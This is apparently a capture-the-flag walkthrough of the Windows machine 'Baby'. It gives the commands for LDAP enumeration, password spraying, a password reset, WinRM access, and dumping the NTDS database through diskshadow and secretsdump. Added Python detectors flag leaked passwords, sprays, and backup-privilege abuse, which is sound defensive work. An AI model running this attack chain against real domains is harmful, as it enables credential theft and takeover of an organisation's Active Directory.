Machine (Easy) - Baby

Writeup for the Baby machine, an easy-level Windows challenge focused on LDAP enumeration and privilege escalation.

Writeup Author: BobBuilder


Objective: Enumerate an exposed LDAP service to discover a default password, gain a foothold with a domain user, and escalate to Domain Admin by abusing backup privileges to extract Active Directory secrets.

Category: Machine
Difficulty: Easy
Platform: Windows
Machine Author: xct


User

LDAP Enumeration

We begin with anonymous LDAP enumeration:

ldapsearch -x -H ldap://<baby_ip> -D '' -w '' -b "DC=baby,DC=vl"

To extract user-related attributes:

ldapsearch -x -H ldap://<baby_ip> -b "DC=baby,DC=vl" distinguishedName sAMAccountName userPrincipalName cn description

This reveals a useful description:

description: Set initial password to <REDACTED>
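Credentials left in free-text attributes like description are a recurring Active Directory hygiene problem, and the same ldapsearch output the attacker reads can be fed to an audit script. The following is an added example, not part of the original writeup: it parses LDIF the way ldapsearch prints it (continuation lines folded, `::` values base64-decoded) and flags descriptions that contain password-like words. The LDIF sample, the account names other than Caroline.Robinson and the sample passwords are constructed for the demonstration.

```python
import base64
import re
from typing import Dict, List

# Constructed ldapsearch-style LDIF output (sample data, not from any real domain).
# The third entry uses the "::" base64 form ldapsearch emits for values with
# leading/trailing spaces; it is encoded at run time so the sample stays readable.
SAMPLE_LDIF = """\
dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
sAMAccountName: Caroline.Robinson
description: Set initial password to Changeme123!

dn: CN=Jane Doe,OU=dev,DC=baby,DC=vl
sAMAccountName: Jane.Doe
description: Developer, ext. 4412,
  building 7B

dn: CN=svc backup,OU=svc,DC=baby,DC=vl
sAMAccountName: svc_backup
description:: {b64}
""".format(b64=base64.b64encode(b"pw: S3cr3t! (temp) ").decode())

# Attribute line: "name: value" or "name:: base64value".
ATTR_LINE = re.compile(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$")
# Words that suggest a credential was written into a free-text attribute.
SECRET_HINT = re.compile(r"\b(pass(word|wd)?|pwd|pw|secret|cred(ential)?s?)\b", re.IGNORECASE)


def parse_ldif(text: str) -> List[Dict[str, List[str]]]:
    """Parse LDIF into a list of entries. Attribute names are lower-cased because
    LDAP treats them case-insensitively."""
    folded: List[str] = []
    for line in text.splitlines():
        if line.startswith(" ") and folded:  # continuation line: one leading space, rest is literal
            folded[-1] += line[1:]
        else:
            folded.append(line)
    entries: List[Dict[str, List[str]]] = []
    current: Dict[str, List[str]] = {}
    for line in folded:
        if not line.strip():  # a blank line terminates an entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = ATTR_LINE.match(line)
        if not m:
            continue
        name, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        current.setdefault(name.lower(), []).append(value)
    if current:
        entries.append(current)
    return entries


def find_credential_hints(text: str) -> List[Dict[str, str]]:
    """Return every entry whose description looks like it carries a password."""
    findings = []
    for entry in parse_ldif(text):
        for desc in entry.get("description", []):
            if SECRET_HINT.search(desc):
                findings.append({
                    "dn": entry.get("dn", ["?"])[0],
                    "account": entry.get("samaccountname", ["?"])[0],
                    "description": desc,
                })
    return findings


if __name__ == "__main__":
    for hit in find_credential_hints(SAMPLE_LDIF):
        print(f"{hit['account']:<20} {hit['description']}")
```

Run it against real output by piping `ldapsearch ... description sAMAccountName` into a file and passing the file contents to `find_credential_hints`; the word list is deliberately broad, so review the hits rather than acting on them automatically.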

Password Spraying

Using this default password, we test against valid usernames:

nxc ldap <baby_ip> -u baby_users.txt -p '<REDACTED>'

We find one account (Caroline.Robinson) returns:

STATUS_PASSWORD_MUST_CHANGE
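From the domain controller's side this spray is a burst of failed logons for many different accounts from one source, and the "hit" is itself logged as a failure: event 4625 with sub-status 0xC0000224 (password must change) means the password was correct. The following is an added detection example, not part of the original writeup; the event records are constructed and simplified (real 4625 events carry more fields), and the account names other than Caroline.Robinson and the IP addresses are made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# NTSTATUS sub-status codes reported in event 4625 ("An account failed to log on").
WRONG_PASSWORD = "0xC000006A"
PASSWORD_MUST_CHANGE = "0xC0000224"  # password was correct, but must be changed at logon

# Constructed sample events (not real log data): one source tries one password against
# six accounts within seconds; a separate user mistypes their own password twice.
SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:01", "event_id": 4625, "ip": "10.10.14.5", "user": "Jane.Doe", "sub_status": WRONG_PASSWORD},
    {"time": "2024-01-01T10:00:02", "event_id": 4625, "ip": "10.10.14.5", "user": "Bob.Smith", "sub_status": WRONG_PASSWORD},
    {"time": "2024-01-01T10:00:03", "event_id": 4625, "ip": "10.10.14.5", "user": "Ian.Walker", "sub_status": WRONG_PASSWORD},
    {"time": "2024-01-01T10:00:04", "event_id": 4625, "ip": "10.10.14.5", "user": "Ashley.Webb", "sub_status": WRONG_PASSWORD},
    {"time": "2024-01-01T10:00:05", "event_id": 4625, "ip": "10.10.14.5", "user": "Caroline.Robinson", "sub_status": PASSWORD_MUST_CHANGE},
    {"time": "2024-01-01T10:00:06", "event_id": 4625, "ip": "10.10.14.5", "user": "Hugh.George", "sub_status": WRONG_PASSWORD},
    {"time": "2024-01-01T10:00:07", "event_id": 4625, "ip": "10.10.10.20", "user": "Bob.Smith", "sub_status": WRONG_PASSWORD},
    {"time": "2024-01-01T10:00:09", "event_id": 4625, "ip": "10.10.10.20", "user": "Bob.Smith", "sub_status": WRONG_PASSWORD},
]


def detect_password_spray(events, window=timedelta(minutes=5), min_users=5):
    """Flag source IPs that fail logons for at least `min_users` distinct accounts
    inside any `window`-long span, and list accounts whose password was actually correct."""
    by_ip = defaultdict(list)
    for e in events:
        if e["event_id"] == 4625:
            by_ip[e["ip"]].append(e)
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])
        times = [datetime.fromisoformat(e["time"]) for e in evs]
        in_window = defaultdict(int)  # user -> failures currently inside the sliding window
        peak, left = 0, 0
        for right, e in enumerate(evs):
            in_window[e["user"].lower()] += 1
            while times[right] - times[left] > window:  # evict events that fell out of the window
                in_window[evs[left]["user"].lower()] -= 1
                left += 1
            peak = max(peak, sum(1 for n in in_window.values() if n > 0))
        if peak >= min_users:
            guessed = sorted({e["user"] for e in evs if e["sub_status"].upper() == PASSWORD_MUST_CHANGE.upper()})
            alerts.append({
                "ip": ip,
                "distinct_users": peak,
                "first": evs[0]["time"],
                "last": evs[-1]["time"],
                "valid_password_for": guessed,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_EVENTS):
        print(alert)
```

The threshold and window are the tuning knobs: a helpdesk or a misconfigured service can also produce failures for several accounts from one host, so start with the allow-listing of known sources before lowering `min_users`. Sub-status 0xC0000224 deserves its own alert regardless of volume, because it tells the attacker the guess worked.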

Password Reset

Reset the password using SMB:

smbpasswd -r <baby_ip> -U 'baby.vl\Caroline.Robinson'
  • Provide old password (<REDACTED>)
  • Set new one (e.g., Password1!)

We now have a valid set of domain credentials.

evil-winrm -i <baby_ip> -u 'Caroline.Robinson' -H '<REDACTED>'

Root

Privilege Discovery

whoami /all
  • SeBackupPrivilege and SeRestorePrivilege are enabled.

SeBackupPrivilege lets a process read any file or registry hive regardless of its ACL, and SeRestorePrivilege lets it write anywhere; together they are enough to take the NTDS database and the registry hives from a shadow copy of the domain controller.

Extracting Domain Hashes from NTDS

To get domain account hashes we need ntds.dit, but the live copy is locked by the directory service, so we take it from a volume shadow copy.

Create a backup.txt for diskshadow:

set verbose on
set metadata C:\Users\Public\Documents\dump.cab
set context persistent
set context clientaccessible
begin backup
add volume C: alias cdrive
create
expose %cdrive% Z:
end backup

Run the snapshot tool:

diskshadow /s backup.txt

Copy the NTDS database from the snapshot:

robocopy /b Z:\Windows\NTDS . ntds.dit

Download all three files (the SYSTEM hive is required because it holds the boot key that decrypts the hashes stored in ntds.dit):

  • ntds.dit
  • sam.save
  • system.save

Dumping Domain Credentials

impacket-secretsdump -ntds ntds.dit -system system.save -sam sam.save LOCAL
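The whole chain above leaves a recognisable footprint on the domain controller: a logon that receives SeBackupPrivilege/SeRestorePrivilege (event 4672, "Special privileges assigned to new logon") for an account that is not a known backup identity, followed by process-creation events (4688 with command-line auditing enabled) for diskshadow driven by a script file and robocopy in backup mode against the NTDS directory. The following is an added detection example, not part of the original writeup; the events are constructed and simplified, and the allowlisted account `svc_veeam` is a made-up placeholder for whatever backup identity a real environment uses.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set

BACKUP_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}
# Accounts expected to log on with backup rights (constructed allowlist; tune per environment).
EXPECTED_BACKUP_ACCOUNTS = {"baby\\svc_veeam"}

# Command-line patterns for the steps of the chain, matched against 4688 process-creation events.
SUSPICIOUS_COMMANDS = [
    (re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s\b", re.IGNORECASE), "diskshadow driven by a script file"),
    (re.compile(r"\brobocopy(\.exe)?\b.*\s/b\b.*\bntds\b", re.IGNORECASE), "robocopy in backup mode against NTDS"),
]

# Constructed sample events (not real log data), already parsed into dicts.
SAMPLE_EVENTS = [
    {"time": "2024-01-01T11:00:00", "event_id": 4672, "user": "BABY\\Caroline.Robinson",
     "privileges": "SeBackupPrivilege\r\n\t\t\tSeRestorePrivilege"},
    {"time": "2024-01-01T11:00:10", "event_id": 4688, "user": "BABY\\Caroline.Robinson",
     "command_line": "diskshadow /s backup.txt"},
    {"time": "2024-01-01T11:00:40", "event_id": 4688, "user": "BABY\\Caroline.Robinson",
     "command_line": "robocopy /b Z:\\Windows\\NTDS . ntds.dit"},
    {"time": "2024-01-01T11:05:00", "event_id": 4672, "user": "BABY\\svc_veeam",
     "privileges": "SeBackupPrivilege"},
    {"time": "2024-01-01T11:06:00", "event_id": 4688, "user": "BABY\\Jane.Doe",
     "command_line": "notepad.exe report.txt"},
]


def privileges_in(event: Dict) -> Set[str]:
    """Event 4672 lists privileges as a whitespace-separated block; split it into names."""
    return {p for p in re.split(r"[\s,]+", event.get("privileges", "")) if p}


def detect_backup_privilege_abuse(events, allowlist=EXPECTED_BACKUP_ACCOUNTS) -> List[Dict]:
    """Correlate backup-privilege logons with shadow-copy/NTDS collection commands per user.
    Severity: high = privilege + command, medium = command only, low = unexpected privilege only."""
    allowed = {a.lower() for a in allowlist}
    priv_hits, cmd_hits = defaultdict(list), defaultdict(list)
    for e in events:
        user = e["user"].lower()
        if e["event_id"] == 4672:
            held = privileges_in(e) & BACKUP_PRIVS
            if held and user not in allowed:
                priv_hits[user].append(
                    "backup/restore privilege on a non-allowlisted logon: " + ", ".join(sorted(held)))
        elif e["event_id"] == 4688:
            for pattern, reason in SUSPICIOUS_COMMANDS:
                if pattern.search(e.get("command_line", "")):
                    cmd_hits[user].append(reason + ": " + e["command_line"])
    alerts = []
    for user in sorted(set(priv_hits) | set(cmd_hits)):
        if priv_hits[user] and cmd_hits[user]:
            severity = "high"
        elif cmd_hits[user]:
            severity = "medium"
        else:
            severity = "low"
        alerts.append({"user": user, "severity": severity, "reasons": priv_hits[user] + cmd_hits[user]})
    return alerts


if __name__ == "__main__":
    for alert in detect_backup_privilege_abuse(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["user"])
        for reason in alert["reasons"]:
            print("   ", reason)
```

The preventive fix is simpler than the detection: review who holds Backup Operators (or any group granting SeBackupPrivilege on domain controllers) and remove ordinary user accounts from it, since on a DC that privilege is equivalent to Domain Admin.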

Administrator Access via WinRM

evil-winrm -i <baby_ip> -u administrator -H <REDACTED>